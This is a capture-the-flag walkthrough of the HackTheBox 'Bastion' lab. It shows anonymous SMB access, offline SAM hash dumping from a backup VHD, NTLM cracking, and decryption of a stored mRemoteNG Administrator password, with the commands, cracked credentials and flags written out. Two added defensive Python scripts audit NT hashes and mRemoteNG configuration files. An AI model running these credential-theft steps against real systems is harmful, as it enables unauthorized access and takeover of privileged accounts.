
HackTheBox Bastion

Edwin Tok | Shiro

IP Address: 10.10.10.134

Key Exploitation Techniques:

  • Offline hash extraction from VHD (SAM/SYSTEM/SECURITY hives)
  • mRemoteNG password decryption from configuration file
  • SMB share enumeration and VHD image retrieval
  • NTLM hash cracking
  • SSH for initial user access

Enumeration

$ nmap -sC -sV -A 10.10.10.134

PORT    STATE SERVICE      VERSION
22/tcp  open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_  256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds

The scan identified SSH and SMB on a Windows Server 2016 host. smbclient was then used to list the accessible shares.

$ smbclient -L \\\\10.10.10.134\\
Password for [WORKGROUP\shiro]: <no password>

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    Backups         Disk
    C$              Disk      Default share
    IPC$            IPC       Remote IPC

The Backups share was accessible anonymously. Browsing its contents revealed a note.txt and a WindowsImageBackup directory containing VHD files.

$ smbclient \\\\10.10.10.134\\Backups
smb: \> ls
  note.txt                       AR       116  Tue Apr 16 18:10:09 2019
  WindowsImageBackup             Dn         0  Fri Feb 22 20:44:02 2019

note.txt contained a hint: do not transfer the entire backup file locally, because the VPN is slow.

> cat note.txt
Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.

The WindowsImageBackup directory contained a subdirectory (e.g., L4mpje-PC/Backup 2019-02-22 124351/) with VHD files (.vhd).

Exploitation

Offline Hash Extraction (L4mpje)

The SMB Backups share was mounted locally using cifs.

$ sudo mkdir -p /mnt/smb
$ sudo mount -t cifs //10.10.10.134/Backups /mnt/smb
Password for root@//10.10.10.134/Backups: <no password>

Listing the backup directory on the mounted share showed two VHD files alongside the backup metadata XML files; the second VHD was later mounted at /mnt/vhd.

/mnt/smb/WindowsImageBackup/L4mpje-PC/Backup $ ls
9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
BackupSpecs.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml

libguestfs-tools was installed, and guestmount was used to mount the second VHD file (9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd) read-only, straight from the mounted SMB share, so the image never had to be copied over the VPN.

$ sudo apt install libguestfs-tools
$ sudo mkdir -p /mnt/vhd
$ sudo guestmount --add '/mnt/smb/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd' --inspector --ro /mnt/vhd

The SAM, SYSTEM, and SECURITY registry hives were located in /mnt/vhd/Windows/System32/config.

$ ls /mnt/vhd/Windows/System32/config
...
SAM
SECURITY
SYSTEM
...

impacket-secretsdump was run in LOCAL mode against these hive files (parsing them offline rather than a live target) to dump the local NTLM hashes.

$ impacket-secretsdump -sam /mnt/vhd/Windows/System32/config/SAM -system /mnt/vhd/Windows/System32/config/SYSTEM -security /mnt/vhd/Windows/System32/config/SECURITY LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
...

The NTLM hash for L4mpje (26112010952d963c8dc4217daec986d9) was cracked using hashcat (mode 1000) with rockyou.txt.

$ hashcat -m 1000 '26112010952d963c8dc4217daec986d9' /usr/share/wordlists/rockyou.txt
...
26112010952d963c8dc4217daec986d9:bureaulampje
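The two steps above (reading the secretsdump output, then confirming that a candidate password really corresponds to a dumped NT hash) can be reproduced and audited without hashcat. The following Python script is an added example, not code from the writeup or from Impacket: it implements MD4 in pure Python (so it does not rely on hashlib's "md4", which many OpenSSL 3 builds disable), derives NT hashes as MD4 over the UTF-16LE password, parses secretsdump-style `user:rid:lmhash:nthash:::` lines, and flags accounts whose NT hash is the well-known hash of the empty password or that still store an LM hash. The sample dump lines are constructed from the output shown above; the function and variable names are this example's own.

```python
import struct

MASK32 = 0xFFFFFFFF
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password (MD4 of b"")
EMPTY_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"  # LM field when no LM hash is stored


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def _f(x, y, z): return (x & y) | (~x & z)
def _g(x, y, z): return (x & y) | (x & z) | (y & z)
def _h(x, y, z): return x ^ y ^ z


# (round function, message-word order, per-step shifts, additive constant), per RFC 1320
_ROUNDS = (
    (_f, list(range(16)), (3, 7, 11, 19), 0x00000000),
    (_g, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13), 0x5A827999),
    (_h, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15), 0x6ED9EBA1),
)


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320): pad, then 48 steps per 64-byte block."""
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    bit_len = len(data) * 8
    data += b"\x80"
    data += b"\x00" * ((56 - len(data) % 64) % 64)
    data += struct.pack("<Q", bit_len)  # 64-bit little-endian bit length
    for off in range(0, len(data), 64):
        x = struct.unpack("<16I", data[off:off + 64])
        v = list(h)
        for func, order, shifts, const in _ROUNDS:
            for i in range(16):
                p = (-i) % 4  # the updated register cycles a, d, c, b
                y, z, w = v[(p + 1) % 4], v[(p + 2) % 4], v[(p + 3) % 4]
                v[p] = _rotl((v[p] + func(y, z, w) + x[order[i]] + const) & MASK32, shifts[i % 4])
        h = [(h[j] + v[j]) & MASK32 for j in range(4)]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> str:
    """NT hash = MD4 over the UTF-16LE encoding of the password, as lowercase hex."""
    return md4(password.encode("utf-16-le")).hex()


def parse_secretsdump(lines):
    """Parse 'user:rid:lmhash:nthash:::' lines as printed by impacket-secretsdump."""
    records = []
    for line in lines:
        line = line.strip()
        if line.startswith("[") or line.startswith("...") or line.count(":") < 3:
            continue  # status lines and elided output
        user, rid, lm, nt = line.split(":")[:4]
        records.append({"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()})
    return records


def audit_dump(lines):
    """Map each account to its findings: empty password and/or legacy LM hash present."""
    findings = {}
    for rec in parse_secretsdump(lines):
        issues = []
        if rec["nt"] == EMPTY_NT_HASH:
            issues.append("empty password")
        if rec["lm"] != EMPTY_LM_HASH:
            issues.append("LM hash stored")
        findings[rec["user"]] = issues
    return findings


def check_candidate(nt_hex: str, candidate: str) -> bool:
    """True if the candidate password hashes to the given NT hash."""
    return nt_hash(candidate) == nt_hex.lower()


# Constructed sample: the SAM lines from the secretsdump output in this writeup.
SAMPLE_DUMP = """\
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
""".splitlines()

if __name__ == "__main__":
    for user, issues in audit_dump(SAMPLE_DUMP).items():
        print(f"{user:14} {', '.join(issues) or 'no finding'}")
    print("L4mpje / bureaulampje matches dump:",
          check_candidate("26112010952d963c8dc4217daec986d9", "bureaulampje"))
```

Run as a script, the audit shows that both built-in accounts in this backup have the empty-password hash, which is itself worth reporting: a backup image that can be read anonymously exposes every local account's NT hash, and for accounts with no password there is nothing to crack. The same `nt_hash` routine is what a blue team can use to confirm a reported crack or to check a break-glass account against its expected hash without running a cracker.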

The password for L4mpje was bureaulampje; SSH access was obtained with these credentials.

$ ssh L4mpje@10.10.10.134

Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
l4mpje@BASTION C:\Users\L4mpje>type Desktop\user.txt
b6230043379272f4b71f11740da4886e

The user.txt flag was retrieved.

Privilege Escalation

mRemoteNG Password Decryption (Administrator)

Enumeration of L4mpje’s AppData\Roaming directory revealed an mRemoteNG folder containing confCons.xml.

l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>dir
...
22-02-2019  14:03             6.316 confCons.xml
...

confCons.xml contained an encrypted password for the Administrator user.

l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>type confCons.xml
<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" ... Protected="ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA" ...>
<Node Name="DC" Type="Connection" ... Username="Administrator" ... Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" Hostname="127.0.0.1" Protocol="RDP" ... />
...
</mrng:Connections>

The encrypted password aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw== was extracted. A public tool, mRemoteNG-Decrypt, was used to decrypt it.

$ git clone https://github.com/haseebT/mRemoteNG-Decrypt
$ cd mRemoteNG-Decrypt
$ python3 mremoteng_decrypt.py -s 'aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=='
Password: thXLHM96BeKL0ER2
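What makes this step possible is that confCons.xml stores connection passwords in the file itself, protected only by mRemoteNG's default master password unless the user has set their own; that is why a generic decrypt tool recovers them. The Python script below is an added example (not from the writeup or the mRemoteNG project) that inventories such a file the way an administrator would when deciding which stored credentials to move out of it: it finds every connection node carrying a password and reports the file's protection settings. The sample XML is constructed to match the structure visible above, with placeholder attribute values; the root attributes not shown on the page (EncryptionEngine, BlockCipherMode, KdfIterations, FullFileEncryption, ConfVersion) are the ones current mRemoteNG versions write and are assumed here. The `find_confcons` helper and its profile-directory layout are this example's own.

```python
import xml.etree.ElementTree as ET
from pathlib import Path

MRNG_NS = "http://mremoteng.org"

# Constructed sample shaped like the confCons.xml in the writeup; values are placeholders.
SAMPLE_CONFCONS = """<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false"
    EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000"
    FullFileEncryption="false" Protected="PLACEHOLDER_PROTECTED_BLOB" ConfVersion="2.6">
  <Node Name="DC" Type="Connection" Username="Administrator" Domain=""
        Password="PLACEHOLDER_ENCRYPTED_PASSWORD" Hostname="127.0.0.1" Protocol="RDP" />
  <Node Name="Lab" Type="Container">
    <Node Name="jump" Type="Connection" Username="svc_backup" Password="PLACEHOLDER_2"
          Hostname="10.0.0.5" Protocol="SSH2" />
    <Node Name="web" Type="Connection" Username="" Password="" Hostname="10.0.0.8" Protocol="HTTP" />
  </Node>
</mrng:Connections>
"""


def audit_confcons(xml_text: str) -> dict:
    """Report protection settings and every connection that stores a password."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    if root.tag != f"{{{MRNG_NS}}}Connections":
        raise ValueError("not an mRemoteNG connections file")
    report = {
        # With full-file encryption the node list is not readable as XML, so an empty
        # inventory below does not mean there are no stored credentials.
        "full_file_encryption": root.get("FullFileEncryption", "false").lower() == "true",
        "kdf_iterations": int(root.get("KdfIterations") or 0),
        "stored_credentials": [],
    }
    # Node elements carry no namespace prefix in the file, so iterate on the bare tag;
    # iter() descends into Container nodes as well.
    for node in root.iter("Node"):
        if node.get("Type") != "Connection" or not node.get("Password"):
            continue
        report["stored_credentials"].append({
            "name": node.get("Name", ""),
            "username": node.get("Username", ""),
            "hostname": node.get("Hostname", ""),
            "protocol": node.get("Protocol", ""),
        })
    return report


def find_confcons(profiles_root: str):
    """Locate confCons.xml under each user profile (the path seen in the writeup)."""
    return sorted(Path(profiles_root).glob("*/AppData/Roaming/mRemoteNG/confCons.xml"))


def summarize(report: dict) -> str:
    """One line per stored credential, plus the protection state, for a review ticket."""
    lines = [f"full-file encryption: {report['full_file_encryption']}, "
             f"KDF iterations: {report['kdf_iterations']}"]
    for cred in report["stored_credentials"]:
        lines.append(f"stored password: {cred['username']}@{cred['hostname']} "
                     f"({cred['protocol']}, connection '{cred['name']}')")
    return "\n".join(lines)


if __name__ == "__main__":
    print(summarize(audit_confcons(SAMPLE_CONFCONS)))
    for path in find_confcons(r"C:\Users"):  # no-op on a non-Windows host
        print(summarize(audit_confcons(path.read_text(encoding="utf-8"))))
```

Running it on the sample lists the Administrator RDP entry and the svc_backup SSH entry and skips the web node with no password. Each reported entry is a credential that anyone able to read the file, which here meant any user logged in as L4mpje, can recover; the remediation is a user-set master password (or full-file encryption) and, for privileged accounts, not saving the password in the client at all.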

The decrypted password for Administrator was thXLHM96BeKL0ER2, and SSH access as Administrator was obtained with it.

$ ssh Administrator@10.10.10.134

Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
administrator@BASTION C:\Users\Administrator>type Desktop\root.txt
9afa7bdc0dae4a62bb28217bebe7053b

The root.txt flag was retrieved.
